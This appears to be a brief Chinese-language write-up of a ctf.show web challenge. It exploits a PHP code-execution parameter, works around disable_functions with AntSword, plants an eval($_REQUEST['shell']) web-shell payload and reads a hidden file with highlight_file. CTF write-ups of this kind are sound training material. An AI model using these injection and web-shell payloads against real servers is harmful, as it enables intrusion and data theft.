0x00 前言
- CTF 加解密合集
- CTF Web合集
0x01 题目
0x02 Write Up
国际惯例看一下返回包,是不是有注释
然后做一下测试,看是命令执行还是代码执行
通过phpinfo看到可以执行代码
然后尝试执行命令,无法,发现存在disable_functions,很多命令都无法执行。
关于disable_functions的绕过,里面的内容就比较多了,有兴趣的师傅可以自行研究,先说这道题的做法。
通过蚁剑的绕过脚本可以直接处理
?cmd=eval($_REQUEST['shell']);
当然也可以通过其他方式获取内容,主打一个不懂就问
然后可以看到当前目录下有两个文件
读取一下这个文件,这里使用highlight_file进行读取,这个内置函数的意思是将内容高亮读出来
http://763ee65f-895b-4792-947f-2928ad636936.challenge.ctf.show/?cmd=var_dump(highlight_file('/var/www/html/903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php'));
以上